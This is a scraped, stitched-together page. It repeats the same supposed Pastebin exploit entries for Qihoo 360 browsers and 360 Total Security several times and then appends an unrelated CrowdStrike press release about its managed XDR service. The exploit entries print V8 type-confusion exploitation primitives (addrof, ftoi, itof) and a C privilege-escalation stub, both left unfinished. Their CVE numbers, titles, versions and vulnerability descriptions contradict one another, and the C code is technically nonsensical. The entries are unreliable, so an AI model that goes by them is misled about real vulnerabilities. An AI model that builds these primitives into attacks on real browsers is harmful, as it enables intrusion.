21.  p.\_\_proto\_\_.x = 0;
    

23.  let b = new ArrayBuffer(8);
    
24.  let f64 = new Float64Array(b);
    
25.  let u32 = new Uint32Array(b);
    

27.  function ftoi(val) {
    
28.  f64\[0\] = val;
    
29.  return BigInt(u32\[0\]) + (BigInt(u32\[1\]) << 32n);
    
30.  }
    

32.  function itof(val) {
    
33.  u32\[0\] = Number(val & 0xffffffffn);
    
34.  u32\[1\] = Number(val >> 32n);
    
35.  return f64\[0\];
    
36.  }
    

38.  function addrof(obj) {
    
39.  o.a = obj;
    
40.  return ftoi(p.x);
    
41.  }
    

43.  // Exploit code goes here
    
44.  }
    

46.  trigger();
    

48.  This PoC code first sets up a type confusion situation in the V8 engine by creating a proxy object and modifying its \_\_proto\_\_ property. The addrof function then leaks the address of an object by causing the type confusion. The ftoi and itof functions are used to convert between floating-point and integer representations, which are essential for exploiting this vulnerability.
    

50.  The RCE vulnerability can allow an attacker to execute arbitrary code on the victim's computer, potentially leading to data theft, unauthorized access, or other malicious actions. Users should update to the latest version of Qihoo 360 Chrome or an alternative browser to mitigate this vulnerability. Browser developers should apply patches to the V8 engine and ensure that proper handling of JavaScript objects is implemented to prevent such issues in the future.
    

52.  \---------------------------------------------------------------------------

CVE-2021-33970: CVE-2021-33970 - Pastebin.com

Buffer Overflow vulnerability in Qihoo 360 Safe Browser v13.0.2170.0 allows attacker to escalate priveleges.

1.  \# Exploit Title: Qihoo 360 Safe Browser v12.3.1611.0 - RCE with Sandbox Escape
    
2.  \# Google Dork: N/A
    
3.  \# Date: 2021-05-11
    
4.  \# Exploit Author: youtube.com/@memorycorruptor
    
5.  \# Vendor Homepage: https://browser.360.cn/se/
    
6.  \# Version: Qihoo 360 Safe Browser v13.0.2170.0
    
7.  \# Tested on: Windows x64 / Linux Debian x64 / MacOS
    
8.  \# CVE: CVE-2021-33972
    
9.  \# PoC Video: https://www.youtube.com/@memorycorruptor/videos
    
10.  \# Description: https://memorycorruptor.blogspot.com/p/vulnerabilities-disclosures.html
    
11.  \---------------------------------------------------------------------------
    
12.  Qihoo 360 Safe Browser v12.3.1611.0 is a web browser built on the Chrome engine, specifically using the V8 JavaScript engine. A recently discovered RCE vulnerability within this version allows attackers to execute arbitrary code on a victim's computer remotely.
    

14.  The vulnerability exists in the V8 JavaScript engine, a critical component of Qihoo 360 Safe Browser v12.3.1611.0. It was discovered in 2021 and is a result of a type confusion issue. This issue occurs when the V8 engine improperly handles certain JavaScript objects, leading to memory corruption and potentially allowing an attacker to execute arbitrary code.
    

16.  function trigger() {
    
17.  let o = {a: 1};
    
18.  let p = new Proxy(o, {});
    
19.  p.\_\_proto\_\_ = {};
    
20.  p.\_\_proto\_\_.x = 0;
    

22.  let b = new ArrayBuffer(8);
    
23.  let f64 = new Float64Array(b);
    
24.  let u32 = new Uint32Array(b);
    

26.  function ftoi(val) {
    
27.  f64\[0\] = val;
    
28.  return BigInt(u32\[0\]) + (BigInt(u32\[1\]) << 32n);
    
29.  }
    

31.  function itof(val) {
    
32.  u32\[0\] = Number(val & 0xffffffffn);
    
33.  u32\[1\] = Number(val >> 32n);
    
34.  return f64\[0\];
    
35.  }
    

37.  function addrof(obj) {
    
38.  o.a = obj;
    
39.  return ftoi(p.x);
    
40.  }
    

42.  // Exploit code goes here
    
43.  }
    

45.  trigger();
    

47.  This PoC code first sets up a type confusion situation in the V8 engine by creating a proxy object and modifying its \_\_proto\_\_ property. The addrof function then leaks the address of an object by causing the type confusion. The ftoi and itof functions are used to convert between floating-point and integer representations, which are essential for exploiting this vulnerability.
    

49.  The RCE vulnerability can allow an attacker to execute arbitrary code on the victim's computer, potentially leading to data theft, unauthorized access, or other malicious actions. Users should update to the latest version of Qihoo 360 Chrome or an alternative browser to mitigate this vulnerability. Browser developers should apply patches to the V8 engine and ensure that proper handling of JavaScript objects is implemented to prevent such issues in the future.
    
50.  \---------------------------------------------------------------------------

CVE-2021-33972: CVE-2021-33972 - Pastebin.com

Buffer Overflow vulnerability in Qihoo 360 Total Security v10.8.0.1060 and v10.8.0.1213 allows attacker to escalate privileges.

1.  \# Exploit Title: Qihoo 360 Safe Browser v13.0.2170.0 - RCE with Sandbox Escape
    
2.  \# Google Dork: N/A
    
3.  \# Date: 2021-05-11
    
4.  \# Exploit Author: youtube.com/@memorycorruptor
    
5.  \# Vendor Homepage: https://browser.360.cn/se/ & https://browser.360.cn/ee/
    
6.  \# Version: Qihoo 360 Safe Browser v13.0.2170.0
    
7.  \# Tested on: Windows x64 / Linux Debian x64 / MacOS
    
8.  \# CVE: CVE-2021-33975
    
9.  \# PoC Video: https://www.youtube.com/@memorycorruptor/videos
    
10.  \# Description: https://memorycorruptor.blogspot.com/p/vulnerabilities-disclosures.html
    
11.  \---------------------------------------------------------------------------
    
12.  Qihoo 360 Safe Browser v13.0.2170.0 is a web browser built on the Chrome engine, specifically using the V8 JavaScript engine. A recently discovered RCE vulnerability within this version allows attackers to execute arbitrary code on a victim's computer remotely.
    

14.  The vulnerability exists in the V8 JavaScript engine, a critical component of Qihoo 360 Safe Browser v13.0.2170.0. It was discovered in 2021 and is a result of a type confusion issue. This issue occurs when the V8 engine improperly handles certain JavaScript objects, leading to memory corruption and potentially allowing an attacker to execute arbitrary code.
    

16.  function trigger() {
    
17.  let o = {a: 1};
    
18.  let p = new Proxy(o, {});
    
19.  p.\_\_proto\_\_ = {};
    
20.  p.\_\_proto\_\_.x = 0;
    

22.  let b = new ArrayBuffer(8);
    
23.  let f64 = new Float64Array(b);
    
24.  let u32 = new Uint32Array(b);
    

26.  function ftoi(val) {
    
27.  f64\[0\] = val;
    
28.  return BigInt(u32\[0\]) + (BigInt(u32\[1\]) << 32n);
    
29.  }
    

31.  function itof(val) {
    
32.  u32\[0\] = Number(val & 0xffffffffn);
    
33.  u32\[1\] = Number(val >> 32n);
    
34.  return f64\[0\];
    
35.  }
    

37.  function addrof(obj) {
    
38.  o.a = obj;
    
39.  return ftoi(p.x);
    
40.  }
    

42.  // Exploit code goes here
    
43.  }
    

45.  trigger();
    

47.  This PoC code first sets up a type confusion situation in the V8 engine by creating a proxy object and modifying its \_\_proto\_\_ property. The addrof function then leaks the address of an object by causing the type confusion. The ftoi and itof functions are used to convert between floating-point and integer representations , which are essential for exploiting this vulnerability.
    

49.  The RCE vulnerability can allow an attacker to execute arbitrary code on the victim's computer, potentially leading to data theft, unauthorized access, or other malicious actions. Users should update to the latest version of Qihoo 360 Chrome or an alternative browser to mitigate this vulnerability. Browser developers should apply patches to the V8 engine and ensure that proper handling of JavaScript objects is implemented to prevent such issues in the future.
    
50.  \---------------------------------------------------------------------------

CVE-2021-33975: CVE-2021-33975 - Pastebin.com

Buffer Overflow vulnerability in Qihoo 360 Safe guard v12.1.0.1004, v12.1.0.1005, v13.1.0.1001 allows attacker to escalate priveleges.

1.  \# Exploit Title: 360 Total Security 10.8.0.1213 Local Privilege Escalation
    
2.  \# Google Dork: N/A
    
3.  \# Date: 2021-05-11
    
4.  \# Exploit Author: youtube.com/@memorycorruptor
    
5.  \# Vendor Homepage: http://www.360totalsecurity.com/
    
6.  \# Version: 360 Total Security 10.8.0.1213
    
7.  \# Tested on: Windows x64 / Linux Debian x64 / MacOS
    
8.  \# CVE: CVE-2021-33973
    
9.  \# PoC Video: https://www.youtube.com/@memorycorruptor/videos
    
10.  \# Description: https://memorycorruptor.blogspot.com/p/vulnerabilities-disclosures.html
    
11.  \---------------------------------------------------------------------------
    
12.  Elevation of Privilege (EOP) Vulnerability in 360 Total Security 10.8.0.1213
    

14.  A Local Privilege Escalation vulnerability in 360 Total Security 10.8.0.1213, which allows the antivirus software to execute actions with system-level privileges while running under standard user privileges, The vulnerability is similar to a Windows kernel vulnerability discovered in 2021.
    

16.  Introduction
    
17.  360 Total Security 10.8.0.1213 is an antivirus software that provides protection against various threats. A recently discovered LPE/EOP vulnerability in the software allows it to perform actions with system-level privileges while running under standard user privileges. This article analyzes this vulnerability and provides a PoC to demonstrate the exploit.
    

19.  Vulnerability
    
20.  The LPE/EOP vulnerability in 360 Total Security 10.8.0.1213 is similar to a Windows kernel vulnerability discovered in 2021. It allows the antivirus software to perform actions with system-level privileges, bypassing the usual security checks in Windows. This can lead to unauthorized access, data theft, or other malicious actions.
    

22.  Proof of Concept
    

24.  #include <Windows.h>
    
25.  #include <stdio.h>
    

27.  int main() {
    
28.  // Load the vulnerable driver
    
29.  HMODULE hDriver = LoadLibrary("360TotalSecurity.sys");
    
30.  if (!hDriver) {
    
31.  printf("Failed to load driver: %d\\n", GetLastError());
    
32.  return 1;
    
33.  }
    

35.  // Get address
    
36.  FARPROC pVulnFunc = GetProcAddress(hDriver, "VulnerableFunction");
    
37.  if (!pVulnFunc) {
    
38.  printf("Failed to get function address: %d\\n", GetLastError());
    
39.  FreeLibrary(hDriver);
    
40.  return 1;
    
41.  }
    

43.  // Exploit code
    

45.  pVulnFunc(/\* Crafted argument \*/);
    

48.  FreeLibrary(hDriver);
    
49.  return 0;
    
50.  }
    

52.  the vulnerable driver (360TotalSecurity.sys) and retrieves the address of the vulnerable function. The exploit code should be placed where indicated, and the vulnerable function should be called with a crafted argument to trigger the LPE/EOP vulnerability.
    
53.  \---------------------------------------------------------------------------

CVE-2021-33973: CVE-2021-33973 - Pastebin.com

**AUSTIN, Texas – April 19, 2023 –** CrowdStrike (Nasdaq: CRWD) today introduced CrowdStrike Falcon Complete XDR, a new Managed eXtended Detection and Response (MXDR) service from the MDR and endpoint security market leader. CrowdStrike Falcon Complete XDR extends the elite expertise of its industry-leading MDR service, which includes 24/7 expert management, threat hunting, monitoring and end-to-end remediation, across all key attack surfaces to close the cybersecurity skills gap. Built on the CrowdStrike Falcon platform, CrowdStrike Falcon Complete XDR unifies human expertise with AI-powered automation and threat intelligence across security and IT categories to operationalize XDR for customers of any security maturity. CrowdStrike Falcon Complete XDR augments in-house teams of all skill levels, breaking down data and organizational silos to stop adversaries. Additionally, CrowdStrike is working with a broad ecosystem of leading partners who have built MXDR services on the CrowdStrike Falcon platform, providing customers a choice in a service delivered by CrowdStrike or managed capabilities offered by a global network of leading partners.

According to an Enterprise Strategy Group (ESG) report1, 47% of organizations believe they don’t have adequate skills for security operations. In addition, there’s an estimated cybersecurity workforce gap of 3.4 million people — and it’s holding organizations back from implementing a mature security program. Meanwhile, the CrowdStrike 2023 Global Threat Report revealed that 71% of cyber attacks detected in 2022 were malware-free (up from 62% in 2021) and interactive intrusions (hands on keyboard activity) increased 50% in 2022 – outlining how sophisticated human adversaries increasingly look to evade legacy antivirus and outsmart machine-only defenses.

“With MDR, CrowdStrike pioneered the idea of creating a seamless union between the technology, human expertise and an organization’s security team to close the gap between detection and response and deliver the outcome of stopping breaches. With Managed XDR services, organizations can entrust the implementation, management, response and end-to-end remediation of advanced threats across multiple vendors and attack surfaces — all without the burden, overhead or costs of deploying and managing a 24/7 threat detection and response function on their own,” said Tom Etheridge, chief global services officer at CrowdStrike.

**Partner-Delivered Managed XDR Services, Powered by CrowdStrike**

Today, CrowdStrike’s partners leverage the CrowdStrike Falcon platform to deliver MXDR services to customers. This unique collaboration, which has proven successful in the MDR market, has become the hallmark of CrowdStrike’s better-together strategy for bringing the value of XDR to organizations of all sizes. Leading Global System Integrators (GSIs) and Managed Security Service Providers (MSSPs) have taken advantage of delivering MXDR services powered by CrowdStrike, including:

*   **Damien Childs, BT’s Director of Cyber & Security Operations:** “The new Managed CrowdStrike Falcon XDR service from BT will allow our customers to reap the benefits of the industry-leading CrowdStrike Falcon platform, while also taking advantage of BT’s extensive managed security service capabilities. The service enables holistic threat protection that extends beyond the endpoint to also include identity and cloud security.”
*   **Rahul Bakshi, Chief Product Officer at eSentire:** “As CrowdStrike’s 2022 Global MSSP Partner of the Year, we provide 24/7 protection to small-to-medium businesses globally who lack the resources and expertise to manage the complexity of multiple points of security telemetry, including the industry-leading CrowdStrike Falcon platform. With eSentire MXDR service powered by CrowdStrike, our customers benefit from advanced protection with proactive threat hunting, deep multi-signal investigation and complete, rapid threat response, with a Mean Time to Contain of only 15 minutes.”
*   **Zeina Zakhour, CTO Digital Security, Eviden, Atos Group:** “CrowdStrike is a strategic partner for Eviden. We are excited to be once again the managed security partner of choice for CrowdStrike’s MXDR program. CrowdStrike EDR is closely integrated with Eviden’s AIsaac platform for delivering first-rate MXDR services. As the #1 MSSP worldwide, Eviden offers customers the ability to integrate existing security technologies in their environment, including XDR platforms like CrowdStrike, which independent analysts recognize as a leader.”
*   **Chris Rothe, CTO and Co-Founder at Red Canary:** “Red Canary MDR seamlessly integrates with the industry-leading CrowdStrike Falcon platform for increased protection against cyberattacks. Using CrowdStrike’s world-class XDR as the foundation, Red Canary monitors an organization’s environment 24×7 to stop more threats, reduce alert noise and speed up response.”
*   **Colin O’Connor, President of Field Operations at ReliaQuest:** “CrowdStrike is a valued partner and our integration with CrowdStrike Falcon Complete further enables us to deliver better security outcomes for joint customers. ReliaQuest GreyMatter, a security operations platform, takes telemetry from the CrowdStrike Falcon platform and combines it with data from other technologies such as SIEMs, CASBs and threat feeds to provide better context, enrich investigations and drive faster responses for proactive protection.”
*   **Alberto Sempere, VP Product & Innovation at Telefonica Tech:** “Telefonica Tech and CrowdStrike have a successful partnership. We are thrilled to have been selected as a preferred Managed Security Service Provider for the CrowdStrike MXDR program. The integration between CrowdStrike technology and Telefonica’s Tech services ensures the provision of exceptional MXDR services and is already a reality for many of our customers.”

“The CrowdStrike Falcon platform is quickly emerging as cybersecurity’s de facto XDR ecosystem. Our partners are foundational in helping organizations of all sizes on their XDR journeys. XDR is a team sport and our partner-friendly, customer-choice approach demonstrates our commitment,” said Daniel Bernard, chief business officer at CrowdStrike. “Partners have the same challenges as customers, which is finding the cybersecurity staff to deliver their services. That’s where the value proposition of CrowdStrike Falcon Complete XDR becomes extremely compelling with partners, such as BT, eSentire, Eviden, Red Canary, ReliaQuest and Telefonica Tech, who are turning to us to augment their own SOCs with CrowdStrike-powered offerings.” 

**MDR’s Market Leader Delivers World’s Best MXDR**

Ranked #1 in MDR market share by Gartner2, and recognized as a leader by IDC3 and Forrester4, CrowdStrike pioneered the MDR category with the CrowdStrike Falcon Complete offering. In the recent and first-ever MITRE Engenuity ATT&CK Evaluations for Security Service Providers, which evaluated 16 MDR providers, CrowdStrike Falcon Complete achieved the highest detection coverage, detecting 75 of 76 (or 99%) adversary techniques.

With CrowdStrike Falcon Complete XDR, CrowdStrike extends these industry-leading MDR capabilities across all supported CrowdStrike Falcon modules and third-party vendors including CrowdXDR Alliance partners.

“Organizations that are looking for a follow-the-sun coverage model and full hands-on remote triage, investigation and end-to-end remediation actions should strongly consider a managed XDR service. CrowdStrike showed in the most recent IDC MarketScape on U.S. MDR that they are well-positioned to meet the needs of organizations that are looking to implement solutions that fulfill their detection and response needs, but do not have the resources to appropriately implement, operate and maintain it,” said Craig Robinson, IDC Research VP of Security Services.

**Additional Resources**

*   For more information on CrowdStrike Falcon Complete XDR, please visit the website.

**About CrowdStrike**

CrowdStrike (Nasdaq: CRWD), a global cybersecurity leader, has redefined modern security with one of the world’s most advanced cloud-native platforms for protecting critical areas of enterprise risk – endpoints and cloud workloads, identity and data.

Powered by the CrowdStrike Security Cloud and world-class AI, the CrowdStrike Falcon® platform leverages real-time indicators of attack, threat intelligence, evolving adversary tradecraft and enriched telemetry from across the enterprise to deliver hyper-accurate detections, automated protection and remediation, elite threat hunting and prioritized observability of vulnerabilities.

Purpose-built in the cloud with a single lightweight-agent architecture, the Falcon platform delivers rapid and scalable deployment, superior protection and performance, reduced complexity and immediate time-to-value.

CrowdStrike: We stop breaches.

Tag

#mac